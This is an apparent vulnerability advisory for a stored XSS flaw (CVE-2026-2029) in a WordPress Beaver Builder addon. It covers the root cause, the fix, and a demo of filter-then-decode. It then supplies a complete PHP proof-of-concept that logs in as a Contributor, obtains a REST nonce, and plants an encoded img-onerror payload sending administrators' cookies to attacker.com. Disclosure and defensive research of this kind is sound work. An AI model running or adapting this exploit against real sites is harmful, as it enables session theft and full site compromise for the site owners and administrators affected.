Atomic Edge analysis of CVE-2026-2029 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Livemesh Addons for Beaver Builder WordPress plugin, affecting versions up to and including 3.9.2. It resides in the `title` and `value` attributes of the `[labb_pricing_item]` shortcode. Attackers with Contributor-level or higher privileges can inject script that executes whenever a user views a page on which the shortcode renders. The CVSS 3.1 base score of 6.4 (Medium) reflects network reachability, low attack complexity and a low-privilege authentication requirement, with a scope change and low confidentiality and integrity impact (this is the score produced by the vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N).
Atomic Edge research identifies the root cause as a flawed sanitization sequence. The description explicitly states the plugin calls `htmlspecialchars_decode()` after `wp_kses_post()`. `wp_kses_post()` strips disallowed tags and attributes, but it leaves HTML entities such as `&lt;` and `&gt;` in place because, to the filter, they are inert text rather than markup. `htmlspecialchars_decode()` then turns those entities back into `<` and `>`, so an entity-encoded tag that passed the filter as text becomes live markup in the rendered page. The sequence therefore re-activates any script payload that was encoded rather than removed by the initial sanitization. This conclusion is directly inferred from the vulnerability description, not from code review.
Exploitation requires an authenticated user with at least Contributor-level permissions. The attacker creates or edits a post or page in the WordPress editor and embeds the `[labb_pricing_item]` shortcode with a JavaScript payload in its `title` or `value` attribute, for example a shortcode of the form `[labb_pricing_item title="Plan ..." value="$10"]` with the payload carried in the `title` value. Because Contributors lack the `unfiltered_html` capability, WordPress runs their post content through `wp_kses` on save, so the payload must survive that filter; an entity-encoded tag does, since the filter treats it as plain text. Upon saving, the payload is stored in the database and executes in the browser of any user (including administrators) who views or previews the page where the shortcode renders.
Effective remediation requires correcting the sanitization and escaping order. Either remove the `htmlspecialchars_decode()` call if it serves no legitimate purpose in this context, or ensure any decoding happens before, never after, the final escape. Shortcode attribute values should be escaped for the context in which they are emitted, `esc_attr()` inside HTML attributes and `esc_html()` inside element content, at the point of output. The patched version should validate and sanitize user input on receipt and escape it on output.
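The following is an added illustration of the root cause and the fix described above; it is not code from the plugin or from Atomic Edge. It models the filter-then-decode order with small stand-ins for `wp_kses_post()` and `esc_html()` (named `fake_*` so they cannot be mistaken for the WordPress functions) so that it runs without WordPress, and the markup, function names and sample attacker input are constructed for the example. The plugin's real handler is not reproduced; only the order of operations matters.

```php
<?php
// Stand-in for wp_kses_post(): keeps a small allow-list of tags and leaves
// already-encoded entities untouched. That second property is what matters:
// the real wp_kses_post() also treats '&lt;img ...&gt;' as text, not a tag.
function fake_wp_kses_post(string $html): string {
    return strip_tags($html, '<strong><em><a><p><br>');
}

// Stand-in for esc_html(): encode for an HTML text context without
// double-encoding entities that are already present (as esc_html() does).
function fake_esc_html(string $text): string {
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8', false);
}

// Vulnerable order (filter, then decode). An entity-encoded tag is plain text
// to the filter; the decode then turns it into live markup in the output.
function render_pricing_item_vulnerable(array $atts): string {
    $title = htmlspecialchars_decode(fake_wp_kses_post($atts['title'] ?? ''));
    $value = htmlspecialchars_decode(fake_wp_kses_post($atts['value'] ?? ''));
    return '<div class="pricing-item"><h3>' . $title . '</h3><span>' . $value . '</span></div>';
}

// Hardened order: no decode at all, and escape for the output context at the
// point of output. The values land inside element content here, so the
// esc_html() equivalent is the right choice; inside an HTML attribute it
// would be esc_attr().
function render_pricing_item_fixed(array $atts): string {
    $title = fake_esc_html(fake_wp_kses_post($atts['title'] ?? ''));
    $value = fake_esc_html(fake_wp_kses_post($atts['value'] ?? ''));
    return '<div class="pricing-item"><h3>' . $title . '</h3><span>' . $value . '</span></div>';
}

// Constructed attacker input: the tag is entity-encoded, as a Contributor
// would have to submit it to survive wp_kses on save, so no '<' reaches
// the filter as markup.
$atts = [
    'title' => '&lt;img src=x onerror=alert(document.domain)&gt;',
    'value' => '$10',
];

$vuln = render_pricing_item_vulnerable($atts);
$safe = render_pricing_item_fixed($atts);

echo "vulnerable: $vuln\n";
echo "fixed:      $safe\n";

// Self-check: the live <img> tag appears only in the vulnerable rendering.
assert(strpos($vuln, '<img src=x onerror=') !== false);
assert(strpos($safe, '<img') === false);
assert(strpos($safe, '&lt;img') !== false);
```

Run it with `php example.php`; the vulnerable line contains a real `<img ... onerror=...>` element while the fixed line keeps the literal `&lt;img ...&gt;` text. For a title that is meant to be plain text, pairing `sanitize_text_field()` on input with `esc_html()` on output is the simplest safe combination in WordPress; applying `wp_kses_post()` to a value that is never supposed to contain markup only widens what has to be reasoned about later.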
Successful exploitation gives the attacker JavaScript execution in the victim's browser under the origin of the vulnerable site. This allows attackers to steal session cookies, perform actions on behalf of the victim (such as creating new administrator accounts), deface the site, or redirect users to malicious sites. The impact is elevated because Contributor-level users, who cannot publish posts, can still submit posts for review. An administrator previewing such a post triggers the payload, potentially leading to full site compromise.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2029 - Livemesh Addons for Beaver Builder <= 3.9.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'title' and 'value' Shortcode Attributes
/*
* Proof of Concept for CVE-2026-2029.
* This script simulates an authenticated Contributor-level user injecting a stored XSS payload
* via the vulnerable [labb_pricing_item] shortcode in a WordPress post.
* Assumptions:
* 1. The target site has the Livemesh Addons for Beaver Builder plugin (<= v3.9.2) installed.
* 2. Valid Contributor-level credentials are available ($username, $password).
* 3. The site uses standard WordPress REST API and admin-ajax endpoints.
* 4. The attacker aims to inject a script that exfiltrates admin session cookies.
*/
$target_url = 'https://vulnerable-wordpress-site.com'; // CONFIGURE THIS
$username = 'contributor_user'; // CONFIGURE THIS
$password = 'contributor_password'; // CONFIGURE THIS
// Payload: basic cookie exfiltration via an <img> onerror handler.
// The payload is placed inside the 'title' attribute of the shortcode.
// It contains no double quotes, so it cannot terminate the shortcode attribute early.
$xss_payload = "<img src=x onerror=fetch('https://attacker.com/steal?c='+encodeURIComponent(document.cookie))>";
// The payload is HTML-entity encoded so that it survives the wp_kses filtering
// WordPress applies to Contributor content on save (entities are inert text to
// the filter); the plugin's htmlspecialchars_decode() call then decodes it back
// into live markup at render time.
$encoded_payload = htmlspecialchars($xss_payload, ENT_QUOTES);
// Construct the shortcode with the malicious payload.
$shortcode = '[labb_pricing_item title="' . $encoded_payload . '" value="$10"]';
$post_title = 'Test Post with XSS - ' . date('Y-m-d H:i:s');
$post_content = "This post contains a malicious pricing item shortcode.\n\n" . $shortcode . "\n\nEnd of content.";
// Step 1: Authenticate and obtain a nonce for REST API requests.
$login_url = $target_url . '/wp-login.php';
$admin_ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $login_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_COOKIEJAR => '/tmp/cookies.txt', // Store session cookies
CURLOPT_COOKIEFILE => '/tmp/cookies.txt',
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
]),
CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded'],
]);
$response = curl_exec($ch);
if ($response === false) {
    die('[-] Login request failed: ' . curl_error($ch) . "\n");
}
// A successful login sets a wordpress_logged_in_* cookie; check the handle's
// in-memory cookie list, since the jar file is only written on curl_close().
$cookies = curl_getinfo($ch, CURLINFO_COOKIELIST);
if (!is_array($cookies) || strpos(implode("\n", $cookies), 'wordpress_logged_in_') === false) {
    die("[-] Login failed: no wordpress_logged_in cookie received. Check the credentials.\n");
}
// Step 2: Fetch a REST API nonce for post creation.
// WordPress core registers a logged-in AJAX action 'rest-nonce' (the endpoint
// wp.apiFetch uses to refresh its nonce). It responds with a bare nonce for the
// 'wp_rest' action, which is exactly what the X-WP-Nonce header must carry.
curl_setopt($ch, CURLOPT_URL, $admin_ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'rest-nonce'
]));
$response = curl_exec($ch);
$nonce = is_string($response) ? trim($response) : '';
// wp_create_nonce() returns a 10-character hex string; admin-ajax answers "0"
// (HTTP 400) when the session is not authenticated or the action is unknown.
if (!preg_match('/^[a-f0-9]{10}$/', $nonce)) {
    die('[-] Could not obtain a REST nonce (response: ' . substr((string) $response, 0, 100) . ").\n");
}
// Step 3: Create a new post via WordPress REST API using the authenticated session.
// Contributor posts are saved as 'draft'.
$rest_url = $target_url . '/wp-json/wp/v2/posts';
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([
'title' => $post_title,
'content' => $post_content,
'status' => 'draft'
]));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'X-WP-Nonce: ' . $nonce // Nonce is required for REST API requests.
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code >= 200 && $http_code < 300) {
    $response_data = json_decode($response, true);
    $post_id = $response_data['id'] ?? 0;
    echo "[+] Post created successfully (ID: $post_id).\n";
    echo "[+] Shortcode injected: $shortcode\n";
    echo "[+] When an administrator previews this draft post, the XSS payload will execute.\n";
    echo "[+] Payload attempts to exfiltrate cookies to attacker.com.\n";
} else {
    echo "[-] Failed to create post. HTTP Code: $http_code\n";
    echo "[-] Response: $response\n";
}
curl_close($ch);
?>